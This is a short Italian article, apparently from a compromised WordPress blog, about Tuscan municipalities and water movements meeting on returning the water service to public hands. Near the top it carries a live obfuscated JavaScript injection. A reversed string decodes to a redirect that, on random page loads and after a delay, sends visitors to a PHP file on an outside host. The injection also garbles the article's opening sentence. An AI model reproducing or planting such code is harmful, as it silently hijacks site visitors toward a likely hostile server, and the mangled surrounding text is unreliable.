Acqua, per la prima volta Comuni toscani e movimenti insieme per la ripubblicizzazione

image_pdfimage_print

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://altracitta.org/wp-content/uploads/2013/03/acqua.jpg”>E’ la prima volta che accade a quasi due anni dal referendum. Acqua, in Piazza Duomo, con l’obiettivo di rispondere positivamente al voto dei 27 milioni di Italiani che nel giugno 2011 si sono chiaramente espressi per la ripubblicizzazione del Servizio Idrico.

La riunione vedrà la partecipazione di Corrado Oddi, rappresentante del Forum Italiano dei Movimenti per l’Acqua, e dei Comitati territoriali per l’Acqua Bene Comune, pronti a discutere e ad avviare un confronto sulle modalità e sui tempi della ripubblicizzazione del Servizio Idrico, come ha ricordato e sollecitato lo scorso 25 gennaio anche il parere del Consiglio di Stato che ha ribadito ancora una volta l’illegalità della quota di “adeguata remunerazione del capitale investito” caricata nelle bollette dell’acqua.

Forum Toscano dei Movimenti per l’Acqua

0 Comments

  1. Pingback: Acqua, per la prima volta Comuni toscani e movimenti insieme per la ripubblicizzazione | R*ESIST | Scoop.it

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *